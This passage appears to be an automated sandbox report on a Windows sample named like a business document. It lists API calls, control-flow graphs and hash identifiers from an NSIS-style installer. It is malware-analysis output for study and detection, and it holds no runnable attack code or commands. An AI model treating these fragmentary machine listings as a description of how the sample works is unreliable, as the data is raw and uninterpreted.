                                                                                                    • lstrcmpiW.KERNEL32(00436800,00435800,00436800,~nsu.tmp,00434000,00000000,?), ref: 004036A4
                                                                                                    • CreateDirectoryW.KERNEL32(00436800,00000000), ref: 004036B0
                                                                                                    • SetCurrentDirectoryW.KERNEL32(00436800), ref: 004036B7
                                                                                                    • DeleteFileW.KERNEL32(0041FEA8,0041FEA8,?,0042A000,?), ref: 00403711
                                                                                                    • CopyFileW.KERNEL32(00437800,0041FEA8,?), ref: 00403725
                                                                                                    • CloseHandle.KERNEL32(00000000,0041FEA8,0041FEA8,?,0041FEA8,00000000), ref: 00403752
                                                                                                    • GetCurrentProcess.KERNEL32(00000028,00000006,00000006,00000005,00000004), ref: 004037AC
                                                                                                    • ExitWindowsEx.USER32(00000002,80040002), ref: 00403804
                                                                                                    • ExitProcess.KERNEL32 ref: 00403827
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000009.00000002.3426540007.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000009.00000002.3426520711.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000009.00000002.3426559445.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000009.00000002.3426577992.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000009.00000002.3426604932.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_9_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: File$DirectoryExitHandleProcesslstrcat$CurrentDeleteEnvironmentModulePathTempVariableWindows$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextProcUninitializelstrcmpilstrcpyn
                                                                                                    • String ID: Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$\Temp$~nsu.tmp
                                                                                                    • API String ID: 4107622049-1875889550
                                                                                                    • Opcode ID: 0611e268b4f88a4563411a583b9d41e63375025e242c0254b8011002441ca5a0
                                                                                                    • Instruction ID: 3f9bff4532b5a1f920197c5518436c484d8c06ab90e6dd2e991860da6f926746
                                                                                                    • Opcode Fuzzy Hash: 0611e268b4f88a4563411a583b9d41e63375025e242c0254b8011002441ca5a0
                                                                                                    • Instruction Fuzzy Hash: 1FC11770604210AAD720BF659D45A2B3EACEB45749F10483FF940B62D2D77D9D41CB7E
                                                                                                    APIs
                                                                                                    • DeleteFileW.KERNEL32(?,?,00436800,76232EE0,00434000), ref: 0040583D
                                                                                                    • lstrcatW.KERNEL32(004246F0,\*.*,004246F0,?,?,00436800,76232EE0,00434000), ref: 00405885
                                                                                                    • lstrcatW.KERNEL32(?,00409014,?,004246F0,?,?,00436800,76232EE0,00434000), ref: 004058A8
                                                                                                    • lstrlenW.KERNEL32(?,?,00409014,?,004246F0,?,?,00436800,76232EE0,00434000), ref: 004058AE
                                                                                                    • FindFirstFileW.KERNEL32(004246F0,?,?,?,00409014,?,004246F0,?,?,00436800,76232EE0,00434000), ref: 004058BE
                                                                                                    • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 0040595E
                                                                                                    • FindClose.KERNEL32(00000000), ref: 0040596D
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000009.00000002.3426540007.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000009.00000002.3426520711.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000009.00000002.3426559445.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000009.00000002.3426577992.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000009.00000002.3426604932.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_9_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                                    • String ID: \*.*
                                                                                                    • API String ID: 2035342205-1173974218
                                                                                                    • Opcode ID: 4ed0ee05c9631dde3e80ce67619df9396c3fab044b7677952d462ea79704d39b
                                                                                                    • Instruction ID: 43b78ede77d9c0270a3625fa09dd856e9a99610c0d190015c3454e79d0f7c46c
                                                                                                    • Opcode Fuzzy Hash: 4ed0ee05c9631dde3e80ce67619df9396c3fab044b7677952d462ea79704d39b
                                                                                                    • Instruction Fuzzy Hash: A541C171900A15E6CB217B61CC49BAF7678EF81768F20817BF801B61D1D77C49829EAE
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000009.00000002.3426540007.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000009.00000002.3426520711.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000009.00000002.3426559445.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000009.00000002.3426577992.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000009.00000002.3426604932.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_9_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 05c614c4f20a384ebef59dc8ddd16a5626e9342178c9d40e40815452f54a0124
                                                                                                    • Instruction ID: de185f48d860fff5590de95dd02018db6e9577308a0edf9c34ceb3d093010d57
                                                                                                    • Opcode Fuzzy Hash: 05c614c4f20a384ebef59dc8ddd16a5626e9342178c9d40e40815452f54a0124
                                                                                                    • Instruction Fuzzy Hash: A7F18870D00269CBCF28CFA8C8946ADBBB1FF44305F25856ED856BB281D7385A96CF44
                                                                                                    APIs
                                                                                                    • FindFirstFileW.KERNEL32(00436800,00425738,00424EF0,00405B28,00424EF0,00424EF0,00000000,00424EF0,00424EF0,00436800,?,76232EE0,00405834,?,00436800,76232EE0), ref: 004062DA
                                                                                                    • FindClose.KERNEL32(00000000), ref: 004062E6
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000009.00000002.3426540007.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000009.00000002.3426520711.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000009.00000002.3426559445.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000009.00000002.3426577992.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000009.00000002.3426604932.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_9_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Find$CloseFileFirst
                                                                                                    • String ID: 8WB
                                                                                                    • API String ID: 2295610775-3088156181
                                                                                                    • Opcode ID: ea398e9f6ccb252cf4d9fa8037675df58843bd33ee06a9524947f1dc2dc69440
                                                                                                    • Instruction ID: 1ee065d6e3812395a970a313fce2833205c85b6b9f4a8d8b1e1fbb38817291b4
                                                                                                    • Opcode Fuzzy Hash: ea398e9f6ccb252cf4d9fa8037675df58843bd33ee06a9524947f1dc2dc69440
                                                                                                    • Instruction Fuzzy Hash: BED0123198A030EBC20067786D0CC4B7A989B553317514ABAF426F63E0C7389C65969D
                                                                                                    APIs
                                                                                                    • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 335661DA
                                                                                                    • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 335661E4
                                                                                                    • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 335661F1
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000009.00000002.3448925785.0000000033561000.00000040.00001000.00020000.00000000.sdmp, Offset: 33560000, based on PE: true
                                                                                                    • Associated: 00000009.00000002.3448907864.0000000033560000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000009.00000002.3448925785.0000000033576000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_9_2_33560000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                    • String ID:
                                                                                                    • API String ID: 3906539128-0
                                                                                                    • Opcode ID: febe200429fc048ce7abfde1939e80b74396898f1647752dbb86befa8a634679
                                                                                                    • Instruction ID: 3bd74d96833af6edda50a44c64369b892584df230fd11d03cf0fd8450f4601a0
                                                                                                    • Opcode Fuzzy Hash: febe200429fc048ce7abfde1939e80b74396898f1647752dbb86befa8a634679
                                                                                                    • Instruction Fuzzy Hash: 1931B57490121CABCB21DF64D988B8DBBB8AF48314F5051DAE81DA7250EB749B868F45
                                                                                                    APIs
                                                                                                    • GetCurrentProcess.KERNEL32(?,?,33564A8A,?,33572238,0000000C,33564BBD,00000000,00000000,?,33562082,33572108,0000000C,33561F3A,?), ref: 33564AD5
                                                                                                    • TerminateProcess.KERNEL32(00000000,?,33564A8A,?,33572238,0000000C,33564BBD,00000000,00000000,?,33562082,33572108,0000000C,33561F3A,?), ref: 33564ADC
                                                                                                    • ExitProcess.KERNEL32 ref: 33564AEE
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000009.00000002.3448925785.0000000033561000.00000040.00001000.00020000.00000000.sdmp, Offset: 33560000, based on PE: true
                                                                                                    • Associated: 00000009.00000002.3448907864.0000000033560000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000009.00000002.3448925785.0000000033576000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_9_2_33560000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Process$CurrentExitTerminate
                                                                                                    • String ID:
                                                                                                    • API String ID: 1703294689-0
                                                                                                    • Opcode ID: 792e5bbee4721596f82ed38ce8630f683a96e60da8251e1079061543f5e1276f
                                                                                                    • Instruction ID: 61db734aae14370076aa0435a37c19a8a5b9ccbc059fa1e4d28e50dd3094b0ed
                                                                                                    • Opcode Fuzzy Hash: 792e5bbee4721596f82ed38ce8630f683a96e60da8251e1079061543f5e1276f
                                                                                                    • Instruction Fuzzy Hash: EFE04F75000644AFCF017F19DD08E893BAAEF40356B409414F90467421DB35D883DB44
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000009.00000002.3448925785.0000000033561000.00000040.00001000.00020000.00000000.sdmp, Offset: 33560000, based on PE: true
                                                                                                    • Associated: 00000009.00000002.3448907864.0000000033560000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000009.00000002.3448925785.0000000033576000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_9_2_33560000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: HeapProcess
                                                                                                    • String ID:
                                                                                                    • API String ID: 54951025-0
                                                                                                    • Opcode ID: 75d8558e7aacfccf949b4b95b57bdb2adedfc486670e54a0e3f839d1d7612243
                                                                                                    • Instruction ID: 84687beb657968bb5aeba9f534ae0b8b38ebde319ef31707a20212d17bded1c8
                                                                                                    • Opcode Fuzzy Hash: 75d8558e7aacfccf949b4b95b57bdb2adedfc486670e54a0e3f839d1d7612243
                                                                                                    • Instruction Fuzzy Hash: 7AA011302002028F8300AE38C30EA0C3AECAA082E03000028B808E0200FB2880038B02

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 139 405373-40538e 140 405394-40545b GetDlgItem * 3 call 4041cf call 404ad1 GetClientRect GetSystemMetrics SendMessageW * 2 139->140 141 40551d-405524 139->141 159 405479-40547c 140->159 160 40545d-405477 SendMessageW * 2 140->160 143 405526-405548 GetDlgItem CreateThread CloseHandle 141->143 144 40554e-40555b 141->144 143->144 146 405579-405583 144->146 147 40555d-405563 144->147 151 405585-40558b 146->151 152 4055d9-4055dd 146->152 149 405565-405574 ShowWindow * 2 call 4041cf 147->149 150 40559e-4055a7 call 404201 147->150 149->146 163 4055ac-4055b0 150->163 156 4055b3-4055c3 ShowWindow 151->156 157 40558d-405599 call 404173 151->157 152->150 154 4055df-4055e5 152->154 154->150 161 4055e7-4055fa SendMessageW 154->161 164 4055d3-4055d4 call 404173 156->164 165 4055c5-4055ce call 405234 156->165 157->150 168 40548c-4054a3 call 40419a 159->168 169 40547e-40548a SendMessageW 159->169 160->159 170 405600-40562b CreatePopupMenu call 405fae AppendMenuW 161->170 171 4056fc-4056fe 161->171 164->152 165->164 178 4054a5-4054b9 ShowWindow 168->178 179 4054d9-4054fa GetDlgItem SendMessageW 168->179 169->168 176 405640-405655 TrackPopupMenu 170->176 177 40562d-40563d GetWindowRect 170->177 171->163 176->171 181 40565b-405672 176->181 177->176 182 4054c8 178->182 183 4054bb-4054c6 ShowWindow 178->183 179->171 180 405500-405518 SendMessageW * 2 179->180 180->171 184 405677-405692 SendMessageW 181->184 185 4054ce-4054d4 call 4041cf 182->185 183->185 184->184 186 405694-4056b7 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 184->186 185->179 188 4056b9-4056e0 SendMessageW 186->188 188->188 189 4056e2-4056f6 GlobalUnlock SetClipboardData CloseClipboard 188->189 189->171
                                                                                                    APIs
                                                                                                    • GetDlgItem.USER32(?,00000403), ref: 004053D1
                                                                                                    • GetDlgItem.USER32(?,000003EE), ref: 004053E0
                                                                                                    • GetClientRect.USER32(?,?), ref: 0040541D
                                                                                                    • GetSystemMetrics.USER32(00000002), ref: 00405424
                                                                                                    • SendMessageW.USER32(?,00001061,00000000,?), ref: 00405445
                                                                                                    • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 00405456
                                                                                                    • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 00405469
                                                                                                    • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 00405477
                                                                                                    • SendMessageW.USER32(?,00001024,00000000,?), ref: 0040548A
                                                                                                    • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 004054AC
                                                                                                    • ShowWindow.USER32(?,00000008), ref: 004054C0
                                                                                                    • GetDlgItem.USER32(?,000003EC), ref: 004054E1
                                                                                                    • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 004054F1
                                                                                                    • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 0040550A
                                                                                                    • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 00405516
                                                                                                    • GetDlgItem.USER32(?,000003F8), ref: 004053EF
                                                                                                      • Part of subcall function 004041CF: SendMessageW.USER32(00000028,?,?,00403FFB), ref: 004041DD
                                                                                                    • GetDlgItem.USER32(?,000003EC), ref: 00405533
                                                                                                    • CreateThread.KERNEL32(00000000,00000000,Function_00005307,00000000), ref: 00405541
                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00405548
                                                                                                    • ShowWindow.USER32(00000000), ref: 0040556C
                                                                                                    • ShowWindow.USER32(?,00000008), ref: 00405571
                                                                                                    • ShowWindow.USER32(00000008), ref: 004055BB
                                                                                                    • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004055EF
                                                                                                    • CreatePopupMenu.USER32 ref: 00405600
                                                                                                    • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 00405614
                                                                                                    • GetWindowRect.USER32(?,?), ref: 00405634
                                                                                                    • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 0040564D
                                                                                                    • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405685
                                                                                                    • OpenClipboard.USER32(00000000), ref: 00405695
                                                                                                    • EmptyClipboard.USER32 ref: 0040569B
                                                                                                    • GlobalAlloc.KERNEL32(00000042,00000000), ref: 004056A7
                                                                                                    • GlobalLock.KERNEL32(00000000), ref: 004056B1
                                                                                                    • SendMessageW.USER32(?,00001073,00000000,?), ref: 004056C5
                                                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 004056E5
                                                                                                    • SetClipboardData.USER32(0000000D,00000000), ref: 004056F0
                                                                                                    • CloseClipboard.USER32 ref: 004056F6
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000009.00000002.3426540007.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000009.00000002.3426520711.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000009.00000002.3426559445.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000009.00000002.3426577992.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000009.00000002.3426604932.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_9_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                                                    • String ID: {$&B
                                                                                                    • API String ID: 590372296-2518801558
                                                                                                    • Opcode ID: a39a70bf23027790c6ceed37ac1eea17eaf571d42ba170f52e1d303d879162e8
                                                                                                    • Instruction ID: 4bfa3faa41321a0cadf5913ced3eb51c87a7cc043350d2f69421d7beec3be44d
                                                                                                    • Opcode Fuzzy Hash: a39a70bf23027790c6ceed37ac1eea17eaf571d42ba170f52e1d303d879162e8
                                                                                                    • Instruction Fuzzy Hash: 92B13971900208BFDB219F60DD89AAE7B79FB04354F00813AFA05BA1A0C7759E52DF69

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 435 403cc2-403cd4 436 403e15-403e24 435->436 437 403cda-403ce0 435->437 439 403e73-403e88 436->439 440 403e26-403e6e GetDlgItem * 2 call 40419a SetClassLongW call 40140b 436->440 437->436 438 403ce6-403cef 437->438 443 403cf1-403cfe SetWindowPos 438->443 444 403d04-403d07 438->444 441 403ec8-403ecd call 4041e6 439->441 442 403e8a-403e8d 439->442 440->439 457 403ed2-403eed 441->457 446 403ec0-403ec2 442->446 447 403e8f-403e9a call 401389 442->447 443->444 449 403d21-403d27 444->449 450 403d09-403d1b ShowWindow 444->450 446->441 456 404167 446->456 447->446 468 403e9c-403ebb SendMessageW 447->468 452 403d43-403d46 449->452 453 403d29-403d3e DestroyWindow 449->453 450->449 460 403d48-403d54 SetWindowLongW 452->460 461 403d59-403d5f 452->461 458 404144-40414a 453->458 465 404169-404170 456->465 463 403ef6-403efc 457->463 464 403eef-403ef1 call 40140b 457->464 458->456 469 40414c-404152 458->469 460->465 466 403e02-403e10 call 404201 461->466 467 403d65-403d76 GetDlgItem 461->467 471 403f02-403f0d 463->471 472 404125-40413e DestroyWindow EndDialog 463->472 464->463 466->465 474 403d95-403d98 467->474 475 403d78-403d8f SendMessageW IsWindowEnabled 467->475 468->465 469->456 477 404154-40415d ShowWindow 469->477 471->472 473 403f13-403f60 call 405fae call 40419a * 3 GetDlgItem 471->473 472->458 505 403f62-403f67 473->505 506 403f6a-403fa6 ShowWindow EnableWindow call 4041bc EnableWindow 473->506 479 403d9a-403d9b 474->479 480 403d9d-403da0 474->480 475->456 475->474 477->456 483 403dcb-403dd0 call 404173 479->483 484 403da2-403da8 480->484 485 403dae-403db3 480->485 483->466 488 403de9-403dfc SendMessageW 484->488 489 403daa-403dac 484->489 485->488 490 403db5-403dbb 485->490 488->466 489->483 493 403dd2-403ddb call 40140b 490->493 494 403dbd-403dc3 call 40140b 490->494 493->466 503 403ddd-403de7 493->503 501 403dc9 494->501 501->483 503->501 505->506 509 403fa8-403fa9 506->509 510 403fab 506->510 511 403fad-403fdb GetSystemMenu EnableMenuItem SendMessageW 509->511 510->511 512 403ff0 511->512 513 403fdd-403fee SendMessageW 511->513 514 403ff6-404034 call 4041cf call 405f8c lstrlenW call 405fae SetWindowTextW call 401389 512->514 513->514 514->457 523 40403a-40403c 514->523 523->457 524 404042-404046 523->524 525 404065-404079 DestroyWindow 524->525 526 404048-40404e 524->526 525->458 527 40407f-4040ac CreateDialogParamW 525->527 526->456 528 404054-40405a 526->528 527->458 529 4040b2-404109 call 40419a GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 527->529 528->457 530 404060 528->530 529->456 535 40410b-404123 ShowWindow call 4041e6 529->535 530->456 535->458
                                                                                                    APIs
                                                                                                    • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403CFE
                                                                                                    • ShowWindow.USER32(?), ref: 00403D1B
                                                                                                    • DestroyWindow.USER32 ref: 00403D2F
                                                                                                    • SetWindowLongW.USER32(?,00000000,00000000), ref: 00403D4B
                                                                                                    • GetDlgItem.USER32(?,?), ref: 00403D6C
                                                                                                    • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403D80
                                                                                                    • IsWindowEnabled.USER32(00000000), ref: 00403D87
                                                                                                    • GetDlgItem.USER32(?,?), ref: 00403E35
                                                                                                    • GetDlgItem.USER32(?,00000002), ref: 00403E3F
                                                                                                    • SetClassLongW.USER32(?,000000F2,?), ref: 00403E59
                                                                                                    • SendMessageW.USER32(0000040F,00000000,?,?), ref: 00403EAA
                                                                                                    • GetDlgItem.USER32(?,00000003), ref: 00403F50
                                                                                                    • ShowWindow.USER32(00000000,?), ref: 00403F71
                                                                                                    • EnableWindow.USER32(?,?), ref: 00403F83
                                                                                                    • EnableWindow.USER32(?,?), ref: 00403F9E
                                                                                                    • GetSystemMenu.USER32(?,00000000,0000F060,?), ref: 00403FB4
                                                                                                    • EnableMenuItem.USER32(00000000), ref: 00403FBB
                                                                                                    • SendMessageW.USER32(?,000000F4,00000000,?), ref: 00403FD3
                                                                                                    • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 00403FE6
                                                                                                    • lstrlenW.KERNEL32(004226E8,?,004226E8,00428200), ref: 0040400F
                                                                                                    • SetWindowTextW.USER32(?,004226E8), ref: 00404023
                                                                                                    • ShowWindow.USER32(?,0000000A), ref: 00404157
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000009.00000002.3426540007.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000009.00000002.3426520711.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000009.00000002.3426559445.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000009.00000002.3426577992.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000009.00000002.3426604932.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_9_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Window$Item$MessageSend$EnableShow$LongMenu$ClassDestroyEnabledSystemTextlstrlen
                                                                                                    • String ID: &B
                                                                                                    • API String ID: 184305955-3208460036
                                                                                                    • Opcode ID: 079b4b4d5fd6d6117bac4e8a8c21c01d9b1a2f1f1a8a46ca874d55dbcaef2845
                                                                                                    • Instruction ID: 96835d82c370a0a6a0181c3c86cda1860f3d4ae5ef3a20f552a9e9ef927ba2a4
                                                                                                    • Opcode Fuzzy Hash: 079b4b4d5fd6d6117bac4e8a8c21c01d9b1a2f1f1a8a46ca874d55dbcaef2845
                                                                                                    • Instruction Fuzzy Hash: DEC1B371A04200BBDB206F61ED49E3B3AA8FB95705F40093EF601B51F1C7799892DB2E

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 538 40391f-403937 call 4062f6 541 403939-403949 call 405ed3 538->541 542 40394b-403982 call 405e59 538->542 551 4039a5-4039ce call 403bf5 call 405adf 541->551 547 403984-403995 call 405e59 542->547 548 40399a-4039a0 lstrcatW 542->548 547->548 548->551 556 403a60-403a68 call 405adf 551->556 557 4039d4-4039d9 551->557 563 403a76-403a9b LoadImageW 556->563 564 403a6a-403a71 call 405fae 556->564 557->556 559 4039df-403a07 call 405e59 557->559 559->556 565 403a09-403a0d 559->565 567 403b1c-403b24 call 40140b 563->567 568 403a9d-403acd RegisterClassW 563->568 564->563 569 403a1f-403a2b lstrlenW 565->569 570 403a0f-403a1c call 405a04 565->570 581 403b26-403b29 567->581 582 403b2e-403b39 call 403bf5 567->582 571 403ad3-403b17 SystemParametersInfoW CreateWindowExW 568->571 572 403beb 568->572 576 403a53-403a5b call 4059d7 call 405f8c 569->576 577 403a2d-403a3b lstrcmpiW 569->577 570->569 571->567 574 403bed-403bf4 572->574 576->556 577->576 580 403a3d-403a47 GetFileAttributesW 577->580 584 403a49-403a4b 580->584 585 403a4d-403a4e call 405a23 580->585 581->574 591 403bc2-403bca call 405307 582->591 592 403b3f-403b5c ShowWindow LoadLibraryW 582->592 584->576 584->585 585->576 600 403be4-403be6 call 40140b 591->600 601 403bcc-403bd2 591->601 594 403b65-403b77 GetClassInfoW 592->594 595 403b5e-403b63 LoadLibraryW 592->595 596 403b79-403b89 GetClassInfoW RegisterClassW 594->596 597 403b8f-403bc0 DialogBoxParamW call 40140b call 40386f 594->597 595->594 596->597 597->574 600->572 601->581 603 403bd8-403bdf call 40140b 601->603 603->581
                                                                                                    APIs
                                                                                                      • Part of subcall function 004062F6: GetModuleHandleA.KERNEL32(?,?,00000020,0040339D,00000009), ref: 00406308
                                                                                                      • Part of subcall function 004062F6: LoadLibraryA.KERNEL32(?,?,00000020,0040339D,00000009), ref: 00406313
                                                                                                      • Part of subcall function 004062F6: GetProcAddress.KERNEL32(00000000,?), ref: 00406324
                                                                                                    • lstrcatW.KERNEL32(00436000,004226E8,80000001,Control Panel\Desktop\ResourceLocale,00000000,004226E8,00000000,00000002,00436800,76233420,00000000,00434000), ref: 004039A0
                                                                                                    • lstrlenW.KERNEL32(004271A0,?,?,?,004271A0,00000000,00434800,00436000,004226E8,80000001,Control Panel\Desktop\ResourceLocale,00000000,004226E8,00000000,00000002,00436800), ref: 00403A20
                                                                                                    • lstrcmpiW.KERNEL32(00427198,.exe,004271A0,?,?,?,004271A0,00000000,00434800,00436000,004226E8,80000001,Control Panel\Desktop\ResourceLocale,00000000,004226E8,00000000), ref: 00403A33
                                                                                                    • GetFileAttributesW.KERNEL32(004271A0), ref: 00403A3E
                                                                                                    • LoadImageW.USER32(00000067,?,00000000,00000000,00008040,00434800), ref: 00403A87
                                                                                                      • Part of subcall function 00405ED3: wsprintfW.USER32 ref: 00405EE0
                                                                                                    • RegisterClassW.USER32(004281A0), ref: 00403AC4
                                                                                                    • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403ADC
                                                                                                    • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403B11
                                                                                                    • ShowWindow.USER32(00000005,00000000), ref: 00403B47
                                                                                                    • LoadLibraryW.KERNEL32(RichEd20), ref: 00403B58
                                                                                                    • LoadLibraryW.KERNEL32(RichEd32), ref: 00403B63
                                                                                                    • GetClassInfoW.USER32(00000000,RichEdit20W,004281A0), ref: 00403B73
                                                                                                    • GetClassInfoW.USER32(00000000,RichEdit,004281A0), ref: 00403B80
                                                                                                    • RegisterClassW.USER32(004281A0), ref: 00403B89
                                                                                                    • DialogBoxParamW.USER32(?,00000000,00403CC2,00000000), ref: 00403BA8
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000009.00000002.3426540007.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000009.00000002.3426520711.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000009.00000002.3426559445.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000009.00000002.3426577992.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000009.00000002.3426604932.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_9_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ClassLoad$InfoLibrary$RegisterWindow$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                                                    • String ID: .DEFAULT\Control Panel\International$.exe$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb$&B
                                                                                                    • API String ID: 914957316-1918744475
